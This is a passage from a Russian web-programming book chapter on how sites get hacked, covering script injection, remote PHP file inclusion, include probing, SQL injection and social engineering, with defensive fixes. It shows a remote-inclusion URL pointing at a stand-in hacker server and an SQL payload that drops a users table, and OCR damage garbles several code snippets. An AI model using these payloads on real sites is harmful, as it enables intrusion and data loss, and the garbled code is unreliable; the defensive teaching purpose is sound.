Сайт располагается на одной странице

Сайт выходит из-под контроля

4.6

Чтобы обезопасить себя, как известно, нужно узнать, чем поль­зуется противник. Узнав некоторые методы взлома сайтов, можно при­нять меры, которые позволят избежать подобных нападений.

Метод, рассчитанный на беспечных

Я бы, конечно, выразился и серьезнее — не беспечных, а неве­жественных. Работа идет с активными сценариями. В главе о языке JavaScript приведен пример, когда скриптом в три строчки можно па­рализовать работу книги отзывов и любого другого средства интерак­тивного обмена мнениями с посетителем, всего лишь потому, что раз­работчик не стал обрабатывать отзывы посетителей перед помещением на сервер. Бывает и хуже. Дело в том, что большинство пользователей смотрит интернет-страницы с помощью браузера Internet Explorer. Об­щеизвестно, что в этом браузере работают как вариант JavaScript — JScript с поддержкой средств работы с файловой системой, так и язык VBScript — он в принципе работает только в этом браузере под Windows (или на серверах). Это значит, что сценариями в этом браузере можно манипулировать файлами и другими объектами в операционной систе­ме, а также копировать файлы с сервера на компьютер. А если учесть, что включаемые сценарии (в файлах с расширениями. js и. vbs) загружа­ются во временные папки на компьютер, то при запуске этих сценариев с вредоносным кодом может произойти непоправимое (троянские фай­лы, удаление и перезапись нужных файлов). Особенно это происходит, если уровень защиты недостаточно высок. И если разработчик не сделал так, чтобы код при обработке данных формы заменялся на специальные подстановки, то можно потерять файлы и на сервере. А ведь сценарии можно вставить не только тэгом <script>, но и с помощью событий, вставляя их в тэги.

Метод подстановки файлов, или PHP-инъекция

Известно, что в большинстве серверных технологий есть средс­тва, позволяющие включать один файл в другой. В части случаев это делается жестким, принудительным методом, когда один файл прос­то запрашивает информацию из другого файла, и это происходит при каждом запросе страницы одинаково (хотя содержание включаемых страниц может меняться). Примеры — включение файлов оформления (шапка и нижняя часть страницы), включение меню, файлов с других серверов. В коде страницы просто пишутся инструкции, заставляющие один файл включать в себя другой.

Но часто встречаются ситуации, когда файл включа­ется динамически. Часто на сайтах попадаются адреса вроде domain. com/?page=company. Суть метода проста: есть ядерный сцена­рий (например, в файле index. php, который загружается по умолчанию); если в строке запроса не передан никакой параметр, то загружается

4

Программирование

Какая-то страница, указанная в сценарии как страница по умолча­нию; если же передано значение какой-то переменной, значение кото­рой — имя файла (или его часть — подставить расширение файла не так сложно), то включается именно этот файл. Легко можно выяснить ос­новную структуру файлов и директорий (например, попробовать за­грузить domain. com/company. php, или domain. com/files/company. php, или domain. com/company. htm — вариантов масса, но перепробовать можно все, особенно если подготовить инструментарий). Дело облегчается, если адреса еще более прозрачны, например, domain. com/?path=company/stuff. Но это не главное. Если разработчик не позаботился о безопасности, то злоумышленник может вручную набрать адрес — например, такой: domain. com/?page=Http://Hakersky-Server.Com/Hack. Что сделает ядерный сценарий? Он примет строку запроса и включит файл с чужого серве­ра, услужливо подставив ему расширение. Что нужно сделать хакеру? Просто написать эту страницу, которой он может управлять файлами на сервере. Поскольку страница включена в основной файл, она авто­матически становится частью сервера, а значит, и получает права на уп­равление. Для начала хакер сможет выяснить полную структуру файлов и директорий на сервере (рекурсивным обходом директорий), потом выяснит переменные окружения, версию PHP и его параметра (функ­ция phpinfo() ), а затем начнет управлять сервером.

Что делать (и кто виноват)? В первую очередь — заменить все ва­рианты префикса http на пустую строку (сценарием, конечно). Чтобы исправить все варианты, нужно сначала перевести все символы полу­ченной строки в нижний регистр. Если сервер не очень большой, мож­но составить список файлов, допустимых к загрузке:

<?

$module=$ GET['module'];

$arr=array(,main,,,about,,,links,,,forum'); if(!in array($module,$arr))$module=$arr[0]; include "$module. php";

?>

Можно использовать другие военные хитрости: при получении строки запроса в нем заменяются некоторые символы и производится проверка существования файла. Например, «о» заменится на «u», «t» — на «d», «/» — на «l», «.» — на «_», а «:» заменится на «w». В этому случае будет запрашиваться фактически не страница company. php, а страница cumpany. php (именно она должна существовать на сервере); даже если не убирать префикс http, в указанном примере сценарий получит на об­работку адрес hddpwllhakersky-server_cumlhack. php, не найдет на сервере

370

Сайт выходит из-под контроля

4.6

Такого адреса и спокойно проигнорирует его. И еще средство: не делать имена переменных столь очевидными. Иногда достаточно делать адреса вида domain. com/7company/stujf или вообще domain. com/company/stuff— в книге есть подробные инструкции, как сделать так, чтобы псевдоди­ректории расценивались сценарием как строка запроса.

Да, и кто виноват: веб-разработчик, который не ставит себя на место заказчика, случайного посетителя, новичка в сети, опытного пользователя и хакера.

Метод включения, или инклюда (англ. include — «включать»)

У каждого хакера есть свой сервер — неважно, арендуемый или личный. На этом сервере есть страницы, которым можно передавать в качестве параметра на обработку чужие страницы. Например, так: на hakersky-server. com есть страница shell. php (или shell. pl, или на другом языке, удобном хакеру). Эта страница позволяет включать в себя файлы с других серверов. Поскольку загружать можно не целиком сформиро­ванные страницы, а отдельные файлы, то хакер может увидеть секретную информацию, просто отключив средства подавления ошибок. Простей­ший пример: в качестве входного параметра файлу shell. php передается адрес Http://Chey-To-Server.Com/Header.Php. Если такой файл существует, хакер радуется, как ребенок, и продолжает работать. Вероятно, на этом чьем-то сервере файл header. php включается в какие-то другие файлы, но в данном случае этого не происходит, и выдаются ошибки либо прос­то некорректный код. В ошибках сообщается, какие именно переменные не инициализированы и т. п. Используя эту информацию, хакер в конце концов может добраться и до тех фрагментов сайта, которые могут пов­лиять на его работу — страницы, которые позволяют записывать текст в файлы и БД, обладают средствами загрузки файлов. Такой подход до­статочно сложен — обычно это кропотливая ручная работа.

На руку хакерам всегда играет шаблонность мышления разработ­чиков. Какой главный файл в директории? Правильно, index. html (или с иными расширениями: чаще всего несложно выяснить, какие расши­рения у файлов на сайте, даже если они скрыты). Изредка — default. html. И редко у кого хватит фантазии назвать главный файл glavnyj. html или apelsin. app, хотя это вполне возможно (главное — правильно написать конфигурационные файлы). Как называются переменная, отвечающая за включение страницы? Правильно, $page, $file или $stranica. Раздел «О компании» всегда называется company. html или about. html — как и файл, который отвечает за загрузку этой страницы. А ведь можно проявить фантазию и тем самым запутать злоумышленника.

Часто разработчики тщательно продумывают защиту ядерных сценариев, но забывают о защите включаемых файлов. В итоге, выяс­нив URL какого-либо системного файла, злоумышленник может узнать достаточно много интересного.

Сайт выходит из-под контроля

4.6

Таким образом, защититься от взлома сложно, но можно: не со­здавать простых паролей, делать их максимально длинными, тщательно шифровать их (наряду со средствами шифрования, предоставляемыми языками серверных сценариев, можно применять и свои функции не­обратимого искажения паролей).

Есть и другие алгоритмы вскрытия паролей, например, The UDC с поддержкой коррекции ошибки ввода. Веб-разработчику нужно тща­тельно изучать возможности дешифровки паролей и создавать макси­мальную защиту от этого.

SQL-инъекция

Этот вид хакерских атак у всех на слуху в связи с тем, что исполь­зование баз данных (особенно MySCQL) для хранения информации очень популярно. Метод состоит в том, что странице каким-то образом передается код SQL-запроса с заведомо вредительскими действиями. Предположим, что код, генерирующий запрос (на языке программи­рования Паскаль), выглядит так: statement := 'SELECT * FROM users WHERE name = "' + userName + '";';

Если в качестве userName задать строку 'a"; DROP TABLE users; SELECT * FROM data WHERE name LIKE "%', то будет сгенерирована такая SQL-команда:

SELECT * FROM users WHERE name = "a"; DROP TABLE users; SELECT * FROM data WHERE name LIKE "%";

Безопасный код должен проводить замену кавычки на ", апос­трофа на ', обратной косой черты на \ (это называется «экраниро­вать спецсимволы»). Это можно делать таким кодом: statement : = 'SELECT * FROM users WHERE name = ' + QuoteParam(userName) + ;;

Perl, PHP, Java, Delphi и другие языки, ориентированные на базы данных, имеют встроенные средства, автоматически выпол­няющие эту операцию: на Delphi — свойство TQuery. Params; на Perl — через DBI::quote или DBI::prepare; на Java — через класс PreparedStatement; на C# — свойство SqlCommand. Parameters; на PHP (при работе с MySQL) — функции mysql escape string, mysql real escape string, addslashes.

Социальная инженерия

Очень, очень губительный метод, рассчитанный на доверчивых людей. Для воплощения этого метода в жизнь не нужно писать сцена­риев и разбираться в алгоритмах шифрования.

Люди постоянно где-то регистрируются. Часто они забывают па­роли. А иногда происходят сбои технического характера. Люди уже при-